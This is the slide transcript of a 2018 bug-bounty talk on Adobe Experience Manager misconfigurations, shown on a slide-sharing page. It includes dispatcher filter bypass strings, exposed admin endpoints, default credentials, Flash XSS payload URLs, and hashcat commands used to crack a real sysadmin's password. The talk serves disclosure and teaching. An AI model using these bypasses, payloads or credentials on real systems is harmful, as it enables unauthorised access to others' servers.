Upgrade to Pro — share decks privately, control downloads, hide ads and more …

A story of the passive aggressive sysadmin of AEM

Avatar for Frans Rosén Frans Rosén
September 13, 2018
Technology
0
8.2k

A story of the passive aggressive sysadmin of AEM

# By Frans Rosén

Adobe Experience Manager is an enterprise CMS with a troubled history. It was created with the angle of high customization factor, enabling consulting firms to deploy it all over the world for huge customers.

Then came security.

Frans will go through some terrible default configuration mistakes, Adobe’s love for bad Flash and how a sysadmin accidentialy exposed an international multi billion dollar company using only sad thoughts.

# About speaker

Frans Rosén is a tech entrepreneur, bug bounty hunter and a Security Advisor at Detectify, a security service for developers. He’s a frequent blogger at Detectify Labs and a top ranked participant of bug bounty programs, receiving some of the highest bounty payouts ever on HackerOne.

Frans was recently featured as #2 on Hackread’s list of 10 Famous Bug Bounty Hunters of All Time and the results of his security research has been covered in numerous international publications such as Observer, BBC, Ars Technica, Wired and Mashable.
Avatar for Frans Rosén

Frans Rosén

September 13, 2018
Tweet

More Decks by Frans Rosén

See All by Frans Rosén
X-Correlation Injections (or How to break server-side contexts)
Avatar for Frans Rosén fransrosen
0
1.3k
Story of a RCE on Apple through hot jar swapping
Avatar for Frans Rosén fransrosen
0
1.2k
Account hijacking using "dirty dancing" in sign-in OAuth-flows
Avatar for Frans Rosén fransrosen
0
230
A methodology using fuzzing and info disclosure
Avatar for Frans Rosén fransrosen
0
310
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Avatar for Frans Rosén fransrosen
3
9.1k
Web based format injection, dumping memory like it's 99 (or "Please help")
Avatar for Frans Rosén fransrosen
0
110
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
Avatar for Frans Rosén fransrosen
3
7.1k

Other Decks in Technology

See All in Technology
Part1 GitHubってなんだろう?その1
Avatar for tomokusaba tomokusaba
3
810
分解し、導き、託す ログラスにおける“技術でリードする” 実践の記録
Avatar for Hiroto Ryushima hryushm
0
340
Previewでもここまで追える! Azure AI Foundryで始めるLLMトレース
Avatar for Tomodo_ysys tomodo_ysys
2
710
20250514 1Passwordを使い倒す道場 vol.1
Avatar for Takumi Abe east_takumi
0
120
TanStack Start 技術選定の裏側 / Findy-Lunch-LT-TanStack-Start
Avatar for Takahiro Ikeuchi iktakahiro
1
150
製造業向けIoTソリューション提案資料.pdf
Avatar for h.uriu haruki_uiru
0
270
2025年8月から始まるAWS Lambda INITフェーズ課金/AWS Lambda INIT phase billing changes
Avatar for quiver quiver
1
1.1k
正式リリースされた Semantic Kernel の Agent Framework 全部紹介!
Avatar for Kazuki okazuki
1
1.2k
MagicPod MCPサーバー開発の裏側とAIエージェント活用の展望
Avatar for MagicPod magicpod
0
240
テストコードにはテストの意図を込めよう(2025年版) #retechtalk / Put the intent of the test 2025
Avatar for nihonbuson nihonbuson
PRO
9
1.7k
Cursorを全エンジニアに配布 その先に見据えるAI駆動開発の未来 / 2025-05-13-forkwell-ai-study-1-cursor-at-loglass
Avatar for Hiroshi Ito itohiro73
2
610
LINE 購物幕後推手
Avatar for LINE Developers Taiwan line_developers_tw
PRO
0
560

Featured

See All Featured
The Cult of Friendly URLs
Avatar for Andy Hume andyhume
78
6.4k
The Web Performance Landscape in 2024 [PerfNow 2024]
Avatar for Tammy Everts tammyeverts
5
570
ReactJS: Keep Simple. Everything can be a component!
Avatar for Pedro Nauck pedronauck
667
120k
Principles of Awesome APIs and How to Build Them.
Avatar for Keavy McMinn keavy
126
17k
Automating Front-end Workflow
Avatar for Addy Osmani addyosmani
1370
200k
Imperfection Machines: The Place of Print at Facebook
Avatar for Scott Boms scottboms
267
13k
Building Flexible Design Systems
Avatar for Yesenia Perez-Cruz yeseniaperezcruz
329
39k
Art, The Web, and Tiny UX
Avatar for Lynn Fisher lynnandtonic
298
20k
Stop Working from a Prison Cell
Avatar for Chris Michel hatefulcrawdad
268
20k
How to Ace a Technical Interview
Avatar for Jacob Kaplan-Moss jacobian
276
23k
Fashionably flexible responsive web design (full day workshop)
Avatar for Andy Clarke malarkey
407
66k
Evolution of real-time – Irina Nazarova, EuRuKo, 2024
Avatar for Irina Nazarova irinanazarova
8
710

Transcript

  1. @fransrosen A story of the passive aggressive sysadmin of AEM

    or "How to make a talk in 3h 35min"

  2. @fransrosen Frans Rosén Bug bounties! labs.detectify.com twitter.com/fransrosen I blogged about

    Subdomain Takeovers. Donald Trump got hacked. The hacker referred to my post as his inspiration. I broke Let’s Encrypt Live hacking! I won a boxing belt once

  3. @fransrosen Frans Rosén Bug bounties! labs.detectify.com twitter.com/fransrosen I blogged about

    Subdomain Takeovers. Donald Trump got hacked. The hacker referred to my post as his inspiration. I broke Let’s Encrypt Live hacking! I won a boxing belt once namedropped in ytcracker - green hat

  4. @fransrosen 2016 – Peter Adkins https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html

  5. @fransrosen 2016 – Peter Adkins https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html CVE-2016-0957

  6. @fransrosen 2016 – Peter Adkins https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html CVE-2016-0957 "The world’s lamest

    RCE."

  7. @fransrosen How AEM is structured https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html

  8. @fransrosen How AEM is structured Adobe "black magic glue"

  9. @fransrosen How AEM is structured Stuff you pay your consultants

    for Adobe "black magic glue"

  10. @fransrosen Shit no one’s updating Stuff you pay your consultants

    for Adobe "black magic glue" How AEM is structured

  11. @fransrosen How AEM is structured https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html

  12. @fransrosen How AEM is structured Apache HTTP server module

  13. @fransrosen How AEM is structured Reverse proxy+filter Apache HTTP server

    module

  14. @fransrosen How AEM is structured Apache HTTP server module Pages

    + metadata + content Reverse proxy+filter

  15. @fransrosen How AEM is structured Apache HTTP server module Pages

    + metadata + content Reverse proxy+filter A bunch of admin-tools

  16. @fransrosen How AEM is structured You should not have access

    to this Apache HTTP server module Pages + metadata + content Reverse proxy+filter A bunch of admin-tools

  17. @fransrosen How AEM is structured You should not have access

    to this Or this Apache HTTP server module Reverse proxy+filter A bunch of admin-tools Pages + metadata + content

  18. @fransrosen Creating pages

  19. @fransrosen Creating pages Author creates a new page in the

    repo

  20. @fransrosen Creating pages Author creates a new page in the

    repo Goes through the publisher nodes

  21. @fransrosen Creating pages Author creates a new page in the

    repo Goes through the publisher nodes Dispatcher serves the content

  22. @fransrosen Accessing pages

  23. @fransrosen Accessing pages Dispatcher gets the URL

  24. @fransrosen Accessing pages Dispatcher gets the URL Goes through a

    filter (This filter is awesome, it’s impossible to break, don’t even dare to try)

  25. @fransrosen Accessing pages Dispatcher gets the URL If all is

    OK, serve from publish node Goes through a filter (This filter is awesome, it’s impossible to break, don’t even dare to try)

  26. @fransrosen CVE-2016-0957 aka "I am two years old but I’m

    inside an enterprise product that no one can or dares to upgrade"

  27. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome,

    it’s impossible to break, don’t even dare to try)

  28. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome,

    it’s impossible to break, don’t even dare to try)

  29. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome,

    it’s impossible to break, don’t even dare to try)

  30. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome,

    it’s impossible to break, don’t even dare to try)

  31. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome,

    it’s impossible to break, don’t even dare to try)

  32. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome,

    it’s impossible to break, don’t even dare to try)

  33. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome,

    it’s impossible to break, don’t even dare to try)

  34. @fransrosen This is ridiculous

  35. @fransrosen Accessing pages?.css Dispatcher gets the URL?.css

  36. @fransrosen Accessing pages Dispatcher gets the URL?.css Every time is

    OK time

  37. @fransrosen Accessing pages Dispatcher gets the URL?.css Every time is

    OK time Serve from publish node

  38. @fransrosen Publish nodes

  39. @fransrosen Disk usage /etc/reports/diskusage.html?.css Disk Usage lists all repo dirs

    + metadata

  40. @fransrosen My fav, opensocial proxy /libs/opensocial/proxy?url=x&.css

  41. @fransrosen My fav, opensocial proxy /libs/opensocial/proxy?url=x&.css

  42. @fransrosen …but there’s more!

  43. @fransrosen CRX Explorer /crx/de/index.jsp?.css

  44. @fransrosen CRX Explorer /crx/explorer/browser/index.jsp?.css

  45. @fransrosen CRX Explorer Search /crx/explorer/browser/index.jsp?.css

  46. @fransrosen Content Repository Extreme /crx/explorer/index.jsp?.css

  47. @fransrosen Package Manager /crx/packmgr/index.jsp?.css

  48. @fransrosen Namespace Editor (no auth needed!) /crx/explorer/ui/namespace_editor.jsp?.css

  49. @fransrosen bin/querybuilder /bin/querybuilder.json?.css

  50. @fransrosen bin/querybuilder /bin/querybuilder.json?.css

  51. @fransrosen

  52. @fransrosen bin/querybuilder for SWFs!

  53. @fransrosen bin/querybuilder for SWFs!

  54. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)

  55. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)

  56. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)

    /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String

  57. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)

    /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// Thx Neal Poole

  58. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)

    /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// Thx Neal Poole

  59. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)

    /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf? stagesize=1&namespacePrefix=alert(document.domain)-window Thx Neal Poole

  60. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)

    /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf? stagesize=1&namespacePrefix=alert(document.domain)-window /etc/dam/viewers/s7sdk/2.9/flash/VideoPlayer.swf? loglevel=,firebug&movie=%5c%22));if(!self.x)self.x=!alert(document.domain) %7dcatch(e)%7b%7d// Thx Neal Poole

  61. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)

    /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf? stagesize=1&namespacePrefix=alert(document.domain)-window /etc/dam/viewers/s7sdk/2.9/flash/VideoPlayer.swf? loglevel=,firebug&movie=%5c%22));if(!self.x)self.x=!alert(document.domain) %7dcatch(e)%7b%7d// /etc/dam/viewers/s7sdk/3.2/flash/VideoPlayer.swf? stagesize=1&namespacePrefix=window[/aler/.source%2b/t/.source] (document.domain)-window Thx Neal Poole

  62. @fransrosen Allowing anonymous publish access

  63. @fransrosen Allowing anonymous publish access

  64. @fransrosen Allowing anonymous publish access

  65. @fransrosen but Peter mentioned RCE?

  66. @fransrosen RCE? https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html

  67. @fransrosen RCE? https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html admin / admin

  68. @fransrosen RCE https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html

  69. @fransrosen RCE https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html

  70. @fransrosen Patch for CVE-2016-0957

  71. @fransrosen Patch for CVE-2016-0957 WOHO! WOHO!

  72. @fransrosen Patch for CVE-2016-0957 WOHO! WOHO!

  73. @fransrosen Patch for CVE-2016-0957 THEN WHAT IS THE PROBLEM? WOHO!

    WOHO!

  74. @fransrosen Problem 1

  75. @fransrosen Problem 1

  76. @fransrosen Problem 1 PRIORITY: nah, bro

  77. @fransrosen Problem 2

  78. @fransrosen Problem 2

  79. @fransrosen Patch for CVE-2016-0957 IRL VERSION

  80. @fransrosen Patch for CVE-2016-0957 IRL

  81. @fransrosen Patch for CVE-2016-0957 IRL

  82. @fransrosen Patch for CVE-2016-0957 IRL

  83. @fransrosen Bypasses, seriously ?.js ;%0a.css Thank Jasmin Landry for this

    one

  84. @fransrosen The passive agressive sysadmin

  85. @fransrosen The passive agressive sysadmin + +

  86. @fransrosen The passive agressive sysadmin + +

  87. @fransrosen I’ve seen this before

  88. @fransrosen AEM

  89. @fransrosen CRX

  90. @fransrosen CRXDE

  91. @fransrosen All other stuff

  92. @fransrosen /system/console

  93. @fransrosen /system/console admin / admin

  94. @fransrosen /system/console admin / admin

  95. @fransrosen Report!

  96. @fransrosen Search time!

  97. @fransrosen Search time!

  98. @fransrosen Search time!

  99. @fransrosen Search time!

  100. @fransrosen WTF

  101. @fransrosen WTF $ h=$(echo "6J7An/QgzU+j5gr1G0CyEexJ9xkgiIyyUzTcmaCCV5g=" \ | base64 -D |

    xxd -p | tr -d '\n')

  102. @fransrosen WTF $ h=$(echo "6J7An/QgzU+j5gr1G0CyEexJ9xkgiIyyUzTcmaCCV5g=" \ | base64 -D |

    xxd -p | tr -d '\n') $ echo $h e89ec09ff420cd4fa3e60af51b40b211ec49f71920888cb25334dc99a082 5798

  103. @fransrosen hashcat ftw $ echo $h > hash.txt $ ./hashcat.app

    -a 0 -m 1400 hash.txt rockyou.txt

  104. @fransrosen hashcat ftw $ echo $h > hash.txt $ ./hashcat.app

    -a 0 -m 1400 hash.txt rockyou.txt 
 Status.........: Cracked Started: Thu Sep 13 11:59:23 2018 Stopped: Thu Sep 13 11:59:25 2018

  105. @fransrosen hashcat ftw ih8uall

  106. @fransrosen /system/console

  107. @fransrosen /system/console admin / ih8uall

  108. @fransrosen /system/console

  109. @fransrosen /system/console

  110. @fransrosen Report 2

  111. @fransrosen Report 2

  112. @fransrosen Report 2

  113. @fransrosen Public bug bounty programs with AEM Public responsible disclosure

    Private ones

  114. @fransrosen Thanks!